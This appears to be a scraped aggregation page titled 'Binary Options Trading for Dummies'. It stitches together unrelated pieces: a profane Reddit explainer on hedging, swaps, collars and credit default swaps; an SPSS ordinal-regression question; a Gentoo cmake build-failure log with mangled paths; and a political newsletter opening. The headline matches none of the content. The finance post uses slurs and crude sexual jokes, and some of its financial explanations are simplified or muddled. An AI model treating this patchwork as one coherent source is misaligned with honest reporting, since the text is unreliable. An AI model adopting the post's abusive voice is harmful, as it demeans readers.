Binary Options Trading for Dummies - The Complete Beginner ...

Everything You Always Wanted To Know About Swaps* (*But Were Afraid To Ask)

Hello, dummies
It's your old pal, Fuzzy.
As I'm sure you've all noticed, a lot of the stuff that gets posted here is - to put it delicately - fucking ridiculous. More backwards-ass shit gets posted to wallstreetbets than you'd see on a Westboro Baptist community message board. I mean, I had a look at the daily thread yesterday and..... yeesh. I know, I know. We all make like the divine Laura Dern circa 1992 on the daily and stick our hands deep into this steaming heap of shit to find the nuggets of valuable and/or hilarious information within (thanks for reading, BTW). I agree. I love it just the way it is too. That's what makes WSB great.
What I'm getting at is that a lot of the stuff that gets posted here - notwithstanding it being funny or interesting - is just... wrong. Like, fucking your cousin wrong. And to be clear, I mean the fucking your *first* cousin kinda wrong, before my Southerners in the back get all het up (simmer down, Billy Ray - I know Mabel's twice removed on your grand-sister's side). Truly, I try to let it slide. I do my bit to try and put you on the right path. Most of the time, I sleep easy no matter how badly I've seen someone explain what a bank liquidity crisis is. But out of all of those tens of thousands of misguided, autistic attempts at understanding the world of high finance, one thing gets so consistently - so *emphatically* - fucked up and misunderstood by you retards that last night I felt obligated at the end of a long work day to pull together this edition of Finance with Fuzzy just for you. It's so serious I'm not even going to make a u/pokimane gag. Have you guessed what it is yet? Here's a clue. It's in the title of the post.
That's right, friends. Today in the neighborhood we're going to talk all about hedging in financial markets - spots, swaps, collars, forwards, CDS, synthetic CDOs, all that fun shit. Don't worry; I'm going to explain what all the scary words mean and how they impact your OTM RH positions along the way.
We're going to break it down like this. (1) "What's a hedge, Fuzzy?" (2) Common Hedging Strategies and (3) All About ISDAs and Credit Default Swaps.
Before we begin. For the nerds and JV traders in the back (and anyone else who needs to hear this up front) - I am simplifying these descriptions for the purposes of this post. I am also obviously not going to try and cover every exotic form of hedge under the sun or give a detailed summation of what caused the financial crisis. If you are interested in something specific ask a question, but don't try and impress me with your Investopedia skills or technical points I didn't cover; I will just be forced to flex my years of IRL experience on you in the comments and you'll look like a big dummy.
TL;DR? Fuck you. There is no TL;DR. You've come this far already. What's a few more paragraphs? Put down the Cheetos and try to concentrate for the next 5-7 minutes. You'll learn something, and I promise I'll be gentle.
Ready? Let's get started.
1. The Tao of Risk: Hedging as a Way of Life
The simplest way to characterize what a hedge 'is' is to imagine every action having a binary outcome. One is bad, one is good. Red lines, green lines; uppie, downie. With me so far? Good. A 'hedge' is simply the employment of a strategy to mitigate the effect of your action having the wrong binary outcome. You wanted X, but you got Z! Frowny face. A hedge strategy introduces a third outcome. If you hedged against the possibility of Z happening, then you can wind up with Y instead. Not as good as X, but not as bad as Z. The technical definition I like to give my idiot juniors is as follows:
Utilization of a defensive strategy to mitigate risk, at a fraction of the cost to capital of the risk itself.
Congratulations. You just finished Hedging 101. "But Fuzzy, that's easy! I just sold a naked call against my 95% OTM put! I'm adequately hedged!". Spoiler alert: you're not (although good work on executing a collar, which I describe below). What I'm talking about here is what would be referred to as a 'perfect hedge'; a binary outcome where downside is totally mitigated by a risk management strategy. That's not how it works IRL. Pay attention; this is the tricky part.
You can't take a single position and conclude that you're adequately hedged because risks are fluid, not static. So you need to constantly adjust your position in order to maximize the value of the hedge and insure your position. You also need to consider exposure to more than one category of risk. There are micro (specific exposure) risks, and macro (trend exposure) risks, and both need to factor into the hedge calculus.
That's why, in the real world, the value of hedging depends entirely on the design of the hedging strategy itself. Here, when we say "value" of the hedge, we're not talking about cash money - we're talking about the intrinsic value of the hedge relative to the the risk profile of your underlying exposure. To achieve this, people hedge dynamically. In wallstreetbets terms, this means that as the value of your position changes, you need to change your hedges too. The idea is to efficiently and continuously distribute and rebalance risk across different states and periods, taking value from states in which the marginal cost of the hedge is low and putting it back into states where marginal cost of the hedge is high, until the shadow value of your underlying exposure is equalized across your positions. The punchline, I guess, is that one static position is a hedge in the same way that the finger paintings you make for your wife's boyfriend are art - it's technically correct, but you're only playing yourself by believing it.
Anyway. Obviously doing this as a small potatoes trader is hard but it's worth taking into account. Enough basic shit. So how does this work in markets?
2. A Hedging Taxonomy
The best place to start here is a practical question. What does a business need to hedge against? Think about the specific risk that an individual business faces. These are legion, so I'm just going to list a few of the key ones that apply to most corporates. (1) You have commodity risk for the shit you buy or the shit you use. (2) You have currency risk for the money you borrow. (3) You have rate risk on the debt you carry. (4) You have offtake risk for the shit you sell. Complicated, right? To help address the many and varied ways that shit can go wrong in a sophisticated market, smart operators like yours truly have devised a whole bundle of different instruments which can help you manage the risk. I might write about some of the more complicated ones in a later post if people are interested (CDO/CLOs, strip/stack hedges and bond swaps with option toggles come to mind) but let's stick to the basics for now.
(i) Swaps
A swap is one of the most common forms of hedge instrument, and they're used by pretty much everyone that can afford them. The language is complicated but the concept isn't, so pay attention and you'll be fine. This is the most important part of this section so it'll be the longest one.
Swaps are derivative contracts with two counterparties (before you ask, you can't trade 'em on an exchange - they're OTC instruments only). They're used to exchange one cash flow for another cash flow of equal expected value; doing this allows you to take speculative positions on certain financial prices or to alter the cash flows of existing assets or liabilities within a business. "Wait, Fuzz; slow down! What do you mean sets of cash flows?". Fear not, little autist. Ol' Fuzz has you covered.
The cash flows I'm talking about are referred to in swap-land as 'legs'. One leg is fixed - a set payment that's the same every time it gets paid - and the other is variable - it fluctuates (typically indexed off the price of the underlying risk that you are speculating on / protecting against). You set it up at the start so that they're notionally equal and the two legs net off; so at open, the swap is a zero NPV instrument. Here's where the fun starts. If the price that you based the variable leg of the swap on changes, the value of the swap will shift; the party on the wrong side of the move ponies up via the variable payment. It's a zero sum game.
I'll give you an example using the most vanilla swap around; an interest rate trade. Here's how it works. You borrow money from a bank, and they charge you a rate of interest. You lock the rate up front, because you're smart like that. But then - quelle surprise! - the rate gets better after you borrow. Now you're bagholding to the tune of, I don't know, 5 bps. Doesn't sound like much but on a billion dollar loan that's a lot of money (a classic example of the kind of 'small, deep hole' that's terrible for profits). Now, if you had a swap contract on the rate before you entered the trade, you're set; if the rate goes down, you get a payment under the swap. If it goes up, whatever payment you're making to the bank is netted off by the fact that you're borrowing at a sub-market rate. Win-win! Or, at least, Lose Less / Lose Less. That's the name of the game in hedging.
There are many different kinds of swaps, some of which are pretty exotic; but they're all different variations on the same theme. If your business has exposure to something which fluctuates in price, you trade swaps to hedge against the fluctuation. The valuation of swaps is also super interesting but I guarantee you that 99% of you won't understand it so I'm not going to try and explain it here although I encourage you to google it if you're interested.
Because they're OTC, none of them are filed publicly. Someeeeeetimes you see an ISDA (dsicussed below) but the confirms themselves (the individual swaps) are not filed. You can usually read about the hedging strategy in a 10-K, though. For what it's worth, most modern credit agreements ban speculative hedging. Top tip: This is occasionally something worth checking in credit agreements when you invest in businesses that are debt issuers - being able to do this increases the risk profile significantly and is particularly important in times of economic volatility (ctrl+f "non-speculative" in the credit agreement to be sure).
(ii) Forwards
A forward is a contract made today for the future delivery of an asset at a pre-agreed price. That's it. "But Fuzzy! That sounds just like a futures contract!". I know. Confusing, right? Just like a futures trade, forwards are generally used in commodity or forex land to protect against price fluctuations. The differences between forwards and futures are small but significant. I'm not going to go into super boring detail because I don't think many of you are commodities traders but it is still an important thing to understand even if you're just an RH jockey, so stick with me.
Just like swaps, forwards are OTC contracts - they're not publicly traded. This is distinct from futures, which are traded on exchanges (see The Ballad Of Big Dick Vick for some more color on this). In a forward, no money changes hands until the maturity date of the contract when delivery and receipt are carried out; price and quantity are locked in from day 1. As you now know having read about BDV, futures are marked to market daily, and normally people close them out with synthetic settlement using an inverse position. They're also liquid, and that makes them easier to unwind or close out in case shit goes sideways.
People use forwards when they absolutely have to get rid of the thing they made (or take delivery of the thing they need). If you're a miner, or a farmer, you use this shit to make sure that at the end of the production cycle, you can get rid of the shit you made (and you won't get fucked by someone taking cash settlement over delivery). If you're a buyer, you use them to guarantee that you'll get whatever the shit is that you'll need at a price agreed in advance. Because they're OTC, you can also exactly tailor them to the requirements of your particular circumstances.
These contracts are incredibly byzantine (and there are even crazier synthetic forwards you can see in money markets for the true degenerate fund managers). In my experience, only Texan oilfield magnates, commodities traders, and the weirdo forex crowd fuck with them. I (i) do not own a 10 gallon hat or a novelty size belt buckle (ii) do not wake up in the middle of the night freaking out about the price of pork fat and (iii) love greenbacks too much to care about other countries' monopoly money, so I don't fuck with them.
(iii) Collars
No, not the kind your wife is encouraging you to wear try out to 'spice things up' in the bedroom during quarantine. Collars are actually the hedging strategy most applicable to WSB. Collars deal with options! Hooray!
To execute a basic collar (also called a wrapper by tea-drinking Brits and people from the Antipodes), you buy an out of the money put while simultaneously writing a covered call on the same equity. The put protects your position against price drops and writing the call produces income that offsets the put premium. Doing this limits your tendies (you can only profit up to the strike price of the call) but also writes down your risk. If you screen large volume trades with a VOL/OI of more than 3 or 4x (and they're not bullshit biotech stocks), you can sometimes see these being constructed in real time as hedge funds protect themselves on their shorts.
(3) All About ISDAs, CDS and Synthetic CDOs
You may have heard about the mythical ISDA. Much like an indenture (discussed in my post on $F), it's a magic legal machine that lets you build swaps via trade confirms with a willing counterparty. They are very complicated legal documents and you need to be a true expert to fuck with them. Fortunately, I am, so I do. They're made of two parts; a Master (which is a form agreement that's always the same) and a Schedule (which amends the Master to include your specific terms). They are also the engine behind just about every major credit crunch of the last 10+ years.
First - a brief explainer. An ISDA is a not in and of itself a hedge - it's an umbrella contract that governs the terms of your swaps, which you use to construct your hedge position. You can trade commodities, forex, rates, whatever, all under the same ISDA.
Let me explain. Remember when we talked about swaps? Right. So. You can trade swaps on just about anything. In the late 90s and early 2000s, people had the smart idea of using other people's debt and or credit ratings as the variable leg of swap documentation. These are called credit default swaps. I was actually starting out at a bank during this time and, I gotta tell you, the only thing I can compare people's enthusiasm for this shit to was that moment in your early teens when you discover jerking off. Except, unlike your bathroom bound shame sessions to Mom's Sears catalogue, every single person you know felt that way too; and they're all doing it at once. It was a fiscal circlejerk of epic proportions, and the financial crisis was the inevitable bukkake finish. WSB autism is absolutely no comparison for the enthusiasm people had during this time for lighting each other's money on fire.
Here's how it works. You pick a company. Any company. Maybe even your own! And then you write a swap. In the swap, you define "Credit Event" with respect to that company's debt as the variable leg . And you write in... whatever you want. A ratings downgrade, default under the docs, failure to meet a leverage ratio or FCCR for a certain testing period... whatever. Now, this started out as a hedge position, just like we discussed above. The purest of intentions, of course. But then people realized - if bad shit happens, you make money. And banks... don't like calling in loans or forcing bankruptcies. Can you smell what the moral hazard is cooking?
Enter synthetic CDOs. CDOs are basically pools of asset backed securities that invest in debt (loans or bonds). They've been around for a minute but they got famous in the 2000s because a shitload of them containing subprime mortgage debt went belly up in 2008. This got a lot of publicity because a lot of sad looking rednecks got foreclosed on and were interviewed on CNBC. "OH!", the people cried. "Look at those big bad bankers buying up subprime loans! They caused this!". Wrong answer, America. The debt wasn't the problem. What a lot of people don't realize is that the real meat of the problem was not in regular way CDOs investing in bundles of shit mortgage debts in synthetic CDOs investing in CDS predicated on that debt. They're synthetic because they don't have a stake in the actual underlying debt; just the instruments riding on the coattails. The reason these are so popular (and remain so) is that smart structured attorneys and bankers like your faithful correspondent realized that an even more profitable and efficient way of building high yield products with limited downside was investing in instruments that profit from failure of debt and in instruments that rely on that debt and then hedging that exposure with other CDS instruments in paired trades, and on and on up the chain. The problem with doing this was that everyone wound up exposed to everybody else's books as a result, and when one went tits up, everybody did. Hence, recession, Basel III, etc. Thanks, Obama.
Heavy investment in CDS can also have a warping effect on the price of debt (something else that happened during the pre-financial crisis years and is starting to happen again now). This happens in three different ways. (1) Investors who previously were long on the debt hedge their position by selling CDS protection on the underlying, putting downward pressure on the debt price. (2) Investors who previously shorted the debt switch to buying CDS protection because the relatively illiquid debt (partic. when its a bond) trades at a discount below par compared to the CDS. The resulting reduction in short selling puts upward pressure on the bond price. (3) The delta in price and actual value of the debt tempts some investors to become NBTs (neg basis traders) who long the debt and purchase CDS protection. If traders can't take leverage, nothing happens to the price of the debt. If basis traders can take leverage (which is nearly always the case because they're holding a hedged position), they can push up or depress the debt price, goosing swap premiums etc. Anyway. Enough technical details.
I could keep going. This is a fascinating topic that is very poorly understood and explained, mainly because the people that caused it all still work on the street and use the same tactics today (it's also terribly taught at business schools because none of the teachers were actually around to see how this played out live). But it relates to the topic of today's lesson, so I thought I'd include it here.
Work depending, I'll be back next week with a covenant breakdown. Most upvoted ticker gets the post.
*EDIT 1\* In a total blowout, $PLAY won. So it's D&B time next week. Post will drop Monday at market open.
submitted by fuzzyblankeet to wallstreetbets [link] [comments]

Ordinal regression help

Hi all, I hope someone would be able to shed some light on my analysis that I’m doing for my masters thesis project. I have to analyze pre-existing survey data to determine if there’s an association between child maltreatment & Life satisfaction. (This is a long one, I’m sorry in advance)
As covid is going on, I’m not able to get prof help in person so I’ve been really struggling and any help is much appreciated!
My exposure variable is child maltreatment and composes 6 questions, of which the possible response options are: 1-5 (never, 1 or 2 times, 3 to 5 times, 6 to 10 times, 10+ times). I want to transform this variable into a binary variable of “ever abused -yes/no” as well as collate into a joint variable, so the scores will go from 6 (never abused for all 6 items) to 30 (abused 10+ times for all items). The dependent variable is life satisfaction measured on a scale of 1-10 and it has been condensed into a scale of 5 categories, from “very satisfied” to “very dissatisfied”. I’ve been using this grouped 5-category life satisfaction variable as the dependent variable in all my analyses so far, is this appropriate ? I’m confused how these analyses are actually accounting for each category of the dependent variable ?
My main question is regarding the analysis. I wanted to do a multiple linear regression but the dependent variable (life satisfaction) is not normally distributed so I feel I’m not able to do it that way. My second option is to do an ordinal regression and I’ve been testing the assumptions but can’t seem to understand how to test for assumption 4(proportional odds). I’m trying to do a binary logistic regression as some posts say online but the values that are computed for df and the -log (logit) values are so large they just can’t be right. Is the ordinal regression the appropriate analysis to use? And if so when I am checking assumptions Do I NOT have to clarify which variables I’m using as my confounders/interaction variables and which is my independent variable ?
Also, should I be using the newly computed independent variables (the 6-30 count variable& the binary yes/no abused variable) ? Or the 6 individual items that pertain to each question on abuse? And if so am I able to include all of these in the same model? All of my confounders/interaction terms I’m using are categorical variables with at least 2 categories, and at most 14 categories (age has been collapsed into 14 categories including 5 ages in each group, i.e., 15-19,20-24,25-29).
When I checked for multicollinearity, I was told to do a linear regression and include all terms; the categorical variables as their dummy variables (so to include the 3 dummy variables coded for a variable that had initially 4 categories) and if the VIF was larger than 10 then to not include that variable. Is this correct? SPSS ended up showing 6 different variables with VIF values much larger than 10 for several of the categories for each variable so does that mean I just take them out at this step and not even include them in the actual ordinal regression? Two of the problematic variables were two of the items on abuse, so when I removed one from the analysis then the other’s VIF value significantly dropped below 10. So in this case would I modify the joint 6-30 count variable on abuse to only be 5-25?
I’m so sorry for all the questions, I know this is such a ramble but if anyone has any experience with ordinal regression in SPSS and is willing to spare a few mins to speak with me I would be forever grateful! Thank you in advance!
submitted by amm173 to spss [link] [comments]

Installing CMake requires CMake?

Hello all,
I've been away from Gentoo for a year, but I'm coming back and trying to install it on a Lenovo Thinkpad X250. My goal is Gentoo without systemd, with Wayland and Sway, eventually migrating (once stable) to hardened+selinux. I used the current-stage3-amd64 build and followed Full Disk Encryption From Scratch Simplified. My systems boots perfectly to runlevel 3 and has no issues with LUKS or networking.
Since first boot, I have installed lm-sensors and laptop-mode-tools, following the wiki for appropriate kernel options to recompile with. Then I wanted to install Wayland + Sway, so I installed dev-libs/wayland, then tried installing gui-wm/sway, but the dependencies failed on graphite2.
I updated the system with emerge -avuDU --keep-going --with-bdeps=y @world, I think graphite2 finished at that point, but then another dependency failed to install. One of the lines was meson: command not found, so I installed meson. Repeat. "ninja: command not found". So I install ninja. Repeat. "cmake: command not found". So I try to install cmake. Except when I install cmake, I get "cmake: command not found".
Is something wrong with my installation? I don't remember these issues last year, and was able to get to a X11/KDE environment without issue.

Here is my build.log for cmake
 * Package: dev-util/cmake-3.14.6 * Repository: gentoo * Maintainer: [email protected] * USE: abi_x86_64 amd64 elibc_glibc kernel_linux ncurses userland_GNU * FEATURES: network-sandbox preserve-libs sandbox userpriv usersandbox >>> Unpacking source... >>> Unpacking cmake-3.14.6.tar.gz to /vatmp/portage/dev-util/cmake-3.14.6/work >>> Source unpacked in /vatmp/portage/dev-util/cmake-3.14.6/work >>> Preparing source in /vatmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6 ... * Applying cmake-3.4.0_rc1-darwin-bundle.patch ... [ ok ] * Applying cmake-3.14.0_rc3-prefix-dirs.patch ... [ ok ] * Applying cmake-3.14.0_rc1-FindBLAS.patch ... [ ok ] * Applying cmake-3.14.0_rc1-FindLAPACK.patch ... [ ok ] * Applying cmake-3.5.2-FindQt4.patch ... [ ok ] * Applying cmake- ... patching file Modules/FindPythonLibs.cmake Hunk #1 succeeded at 117 with fuzz 2 (offset 43 lines). [ ok ] * Applying cmake-3.9.0_rc2-FindPythonInterp.patch ... [ ok ] * Working in BUILD_DIR: "/vatmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6_build" * Hardcoded definition(s) removed in CMakeLists.txt: * set(CMAKE_INSTALL_PREFIX "${CMAKE_INSTALL_PREFIX}/") * Hardcoded definition(s) removed in Tests/JavaJavah/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/QtAutogen/UicInterface/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE ON) * Hardcoded definition(s) removed in Tests/JavaNativeHeaders/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/Qt4Deploy/CMakeLists.txt: * set(CMAKE_INSTALL_PREFIX ${CMAKE_CURRENT_BINARY_DIR}/install) * Hardcoded definition(s) removed in Tests/CPackComponents/CMakeLists.txt: * set(CMAKE_INSTALL_PREFIX "/opt/mylib") * Hardcoded definition(s) removed in Tests/SetLang/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/CMakeOnly/SelectLibraryConfigurations/CMakeLists.txt: * set(CMAKE_BUILD_TYPE Debug) * Hardcoded definition(s) removed in Tests/CMakeOnly/CheckCXXCompilerFlag/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/Java/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/AssembleCMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/FindPackageTest/CMakeLists.txt: * set(CMAKE_INSTALL_PREFIX "${CMAKE_CURRENT_BINARY_DIR}/NotDefaultPrefix") * Hardcoded definition(s) removed in Tests/OutDiCMakeLists.txt: * set(CMAKE_BUILD_TYPE) * set(CMAKE_BUILD_TYPE Debug) * Hardcoded definition(s) removed in Tests/RunCMake/CPack/CMakeLists.txt: * set(CMAKE_BUILD_TYPE "Debug" CACHE STRING "") * Hardcoded definition(s) removed in Tests/JavaExportImport/BuildExport/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/JavaExportImport/InstallExport/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/JavaExportImport/Import/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/Fortran/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/SubDirSpaces/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE 1) * Hardcoded definition(s) removed in Tests/CMakeCommands/target_compile_features/CMakeLists.txt: * set(CMAKE_VERBOSE_MAKEFILE ON) >>> Source prepared. >>> Configuring source in /vatmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6 ... * Working in BUILD_DIR: "/vatmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6_build" cmake -C /vatmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6_build/gentoo_common_config.cmake -G Unix Makefiles -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_USE_SYSTEM_LIBRARIES=ON -DCMAKE_USE_SYSTEM_LIBRARY_JSONCPP=no -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_DOC_DIR=/share/doc/cmake-3.14.6 -DCMAKE_MAN_DIR=/share/man -DCMAKE_DATA_DIR=/share/cmake -DSPHINX_MAN=no -DSPHINX_HTML=no -DBUILD_CursesDialog=yes -DBUILD_TESTING=no -DCMAKE_BUILD_TYPE=Gentoo -DCMAKE_TOOLCHAIN_FILE=/vatmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6_build/gentoo_toolchain.cmake /vatmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6 /vatmp/portage/dev-util/cmake-3.14.6/temp/environment: line 920: cmake: command not found * ERROR: dev-util/cmake-3.14.6::gentoo failed (configure phase): * cmake failed * * Call stack: *, line 125: Called src_configure * environment, line 2230: Called cmake_src_configure * environment, line 920: Called die * The specific snippet of code: * "${CMAKE_BINARY}" "${cmakeargs[@]}" "${CMAKE_USE_DIR}" || die "cmake failed"; * * If you need support, post the output of `emerge --info '=dev-util/cmake-3.14.6::gentoo'`, * the complete build log and the output of `emerge -pqv '=dev-util/cmake-3.14.6::gentoo'`. * The complete build log is located at '/vatmp/portage/dev-util/cmake-3.14.6/temp/build.log'. * The ebuild environment file is located at '/vatmp/portage/dev-util/cmake-3.14.6/temp/environment'. * Working directory: '/vatmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6_build' * S: '/vatmp/portage/dev-util/cmake-3.14.6/work/cmake-3.14.6' 
And the output from emerge --info '=dev-util/cmake-3.14.6::gentoo'
Portage 2.3.84 (python 3.6.9-final-0, default/linux/amd64/17.1, gcc-9.2.0, glibc-2.29-r7, 4.19.97-gentoo-x86_64 x86_64) ================================================================= System Settings ================================================================= System uname: Lin[email protected]_2.30GHz-with-gentoo-2.6 KiB Mem: 16292612 total, 15779948 free KiB Swap: 4194300 total, 4194300 free Timestamp of repository gentoo: Mon, 03 Feb 2020 00:45:01 +0000 Head commit of repository gentoo: cf12d7fd5d98f5209513bcc9b93388e98d785fd5 sh bash 4.4_p23-r1 ld GNU ld (Gentoo 2.32 p2) 2.32.0 app-shells/bash: 4.4_p23-r1::gentoo dev-lang/perl: 5.30.1::gentoo dev-lang/python: 2.7.17::gentoo, 3.6.9::gentoo dev-util/cmake: 3.14.6::gentoo sys-apps/baselayout: 2.6-r1::gentoo sys-apps/openrc: 0.42.1::gentoo sys-apps/sandbox: 2.13::gentoo sys-devel/autoconf: 2.69-r4::gentoo sys-devel/automake: 1.16.1-r1::gentoo sys-devel/binutils: 2.32-r1::gentoo sys-devel/gcc: 9.2.0-r2::gentoo sys-devel/gcc-config: 2.1::gentoo sys-devel/libtool: 2.4.6-r6::gentoo sys-devel/make: 4.2.1-r4::gentoo sys-kernel/linux-headers: 4.19::gentoo (virtual/os-headers) sys-libs/glibc: 2.29-r7::gentoo Repositories: gentoo location: /vadb/repos/gentoo sync-type: rsync sync-uri: rsync:// priority: -1000 sync-rsync-verify-jobs: 1 sync-rsync-verify-max-age: 24 sync-rsync-extra-opts: sync-rsync-verify-metamanifest: yes ACCEPT_KEYWORDS="amd64" ACCEPT_LICENSE="@FREE" CBUILD="x86_64-pc-linux-gnu" CFLAGS="-O2 -pipe" CHOST="x86_64-pc-linux-gnu" CONFIG_PROTECT="/etc /usshare/gnupg/qualified.txt" CONFIG_PROTECT_MASK="/etc/ca-certificates.conf /etc/env.d /etc/gconf /etc/gentoo-release /etc/sandbox.d /etc/terminfo" CXXFLAGS="-O2 -pipe" DISTDIR="/vacache/distfiles" ENV_UNSET="DBUS_SESSION_BUS_ADDRESS DISPLAY GOBIN PERL5LIB PERL5OPT PERLPREFIX PERL_CORE PERL_MB_OPT PERL_MM_OPT XAUTHORITY XDG_CACHE_HOME XDG_CONFIG_HOME XDG_DATA_HOME XDG_RUNTIME_DIR" FCFLAGS="-O2 -pipe" FEATURES="assume-digests binpkg-docompress binpkg-dostrip binpkg-logs config-protect-if-modified distlocks ebuild-locks fixlafiles ipc-sandbox merge-sync multilib-strict network-sandbox news parallel-fetch pid-sandbox preserve-libs protect-owned sandbox sfperms strict unknown-features-warn unmerge-logs unmerge-orphans userfetch userpriv usersandbox usersync xattr" FFLAGS="-O2 -pipe" GENTOO_MIRRORS="" LANG="C" LDFLAGS="-Wl,-O1 -Wl,--as-needed" MAKEOPTS="-j3" PKGDIR="/vacache/binpkgs" PORTAGE_CONFIGROOT="/" PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --omit-dir-times --compress --force --whole-file --delete --stats --human-readable --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages --exclude=/.git" PORTAGE_TMPDIR="/vatmp" USE="acl amd64 berkdb bzip2 cli crypt cxx dri fortran gdbm iconv ipv6 libtirpc multilib ncurses nls nptl openmp pam pcre readline seccomp split-usr ssl tcpd unicode wayland xattr zlib" ABI_X86="64" ADA_TARGET="gnat_2018" ALSA_CARDS="ali5451 als4000 atiixp atiixp-modem bt87x ca0106 cmipci emu10k1x ens1370 ens1371 es1938 es1968 fm801 hda-intel intel8x0 intel8x0m maestro3 trident usb-audio via82xx via82xx-modem ymfpci" APACHE2_MODULES="authn_core authz_core socache_shmcb unixd actions alias auth_basic authn_alias authn_anon authn_dbm authn_default authn_file authz_dbm authz_default authz_groupfile authz_host authz_owner authz_user autoindex cache cgi cgid dav dav_fs dav_lock deflate dir disk_cache env expires ext_filter file_cache filter headers include info log_config logio mem_cache mime mime_magic negotiation rewrite setenvif speling status unique_id userdir usertrack vhost_alias" CALLIGRA_FEATURES="karbon sheets words" COLLECTD_PLUGINS="df interface irq load memory rrdtool swap syslog" CPU_FLAGS_X86="mmx mmxext sse sse2" ELIBC="glibc" GPSD_PROTOCOLS="ashtech aivdm earthmate evermore fv18 garmin garmintxt gpsclock greis isync itrax mtk3301 nmea ntrip navcom oceanserver oldstyle oncore rtcm104v2 rtcm104v3 sirf skytraq superstar2 timing tsip tripmate tnt ublox ubx" INPUT_DEVICES="libinput keyboard mouse" KERNEL="linux" LCD_DEVICES="bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses text" LIBREOFFICE_EXTENSIONS="presenter-console presenter-minimizer" OFFICE_IMPLEMENTATION="libreoffice" PHP_TARGETS="php7-2" POSTGRES_TARGETS="postgres10 postgres11" PYTHON_SINGLE_TARGET="python3_6" PYTHON_TARGETS="python2_7 python3_6" RUBY_TARGETS="ruby24 ruby25" USERLAND="GNU" VIDEO_CARDS="amdgpu fbdev intel nouveau radeon radeonsi vesa dummy v4l" XTABLES_ADDONS="quota2 psd pknock lscan length2 ipv4options ipset ipp2p iface geoip fuzzy condition tee tarpit sysrq steal rawnat logmark ipmark dhcpmac delude chaos account" Unset: CC, CPPFLAGS, CTARGET, CXX, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LC_ALL, LINGUAS, PORTAGE_BINHOST, PORTAGE_BUNZIP2_COMMAND, PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS ================================================================= Package Settings ================================================================= dev-util/cmake-3.14.6::gentoo was built with the following: USE="ncurses -doc -emacs -qt5 -system-jsoncpp -test" ABI_X86="(64)" FEATURES="assume-digests binpkg-docompress binpkg-dostrip binpkg-logs buildpkg config-protect-if-modified distlocks ebuild-locks fail-clean fixlafiles ipc-sandbox merge-sync multilib-strict network-sandbox parallel-fetch preserve-libs protect-owned sandbox selinux sesandbox sfperms strict unknown-features-warn unmerge-logs unmerge-orphans userfetch userpriv usersandbox usersync xattr" 
Thank you for looking at this! Any guidance would be appreciated!
submitted by ragnarok189 to Gentoo [link] [comments]

Joe Walsh Will Not Save Us (G-File)

Dear Reader (including the poor Biden staffers who have to white-knuckle their armrests when not sucking down unfiltered Marlboros every time Joe Biden gives an interview),
If you’ve never heard the Milton Friedman shovels and spoons story, you will (and I don’t just mean here). Because everyone on the right tells some version of it at some point. The other Uncle Miltie (i.e., not the epically endowed comedic genius) goes to Asia or Africa or South America and is taken on a tour of some public works project in a developing country. Hundreds of laborers are digging with shovels. Milton asks the official in charge something like, “Why use shovels when earth moving equipment would be so much more efficient?”
The official replies that this is a jobs program and using shovels creates more jobs.
Friedman guffaws and asks, “In that case: Why not use spoons?”
The story might not be true, but the insight is timeless.
Here’s another story: When I was in college, we were debating in intro to philosophy the differences between treating men and women “equally” versus treating them the “same.” At first blush, the two things sound synonymous, but they’re not (indeed the difference illuminates the chasm of difference between classical liberalism and socialism, but that’s a topic for another day). I pointed out that there were some firefighter programs that had different physical requirements for male applicants and female ones (this was before it was particularly controversial—outside discussions of Foucault—to assume there were clear differences between sexes). Female applicants had to complete an obstacle course carrying a 100-pound dummy, but men had to carry a 200-pound dummy, or something like that. A puckish freshperson named Jonah Goldberg said: “I don’t really care if a firefighter is a man, a woman, or a gorilla, I’d just like them to be able to rescue me from a fire.”
A woman sitting in front of me wheeled around and womansplained to me that “you can always just hire two women.”
I shot back something like, “You could also hire 17 midgets, that’s not the point.”
(I apologize for using the word midget, which wasn’t on the proscribed terms list at the time.)
But here’s the thing: Sometimes it is the point. Whether you’re talking about spoons or little people, the case for efficiency is just one case among many. Don’t get me wrong, I think it’s an important one, but it’s not the only one. Sometimes older children are told to bring their little brothers or sisters along on some trip. They’ll complain, “But they’ll just slow us down!” or, “But they aren’t allowed on the big kid rides.” Parents understand the point, but they are not prioritizing efficiency over love. Or, they’re prioritizing a different efficiency: Not being stuck with a little kid who’s crying all day because he or she was left behind.
One of my favorite scenes in the movie Searching for Bobby Fischer is when the chess tutor Bruce Pandolfini, played by Ben Kingsley, tells the chess prodigy’s parents that they have to forbid their son from playing pickup chess in the park because he learns bad chess habits there. The mom says “Not playing in the park would kill him. He loves it.”
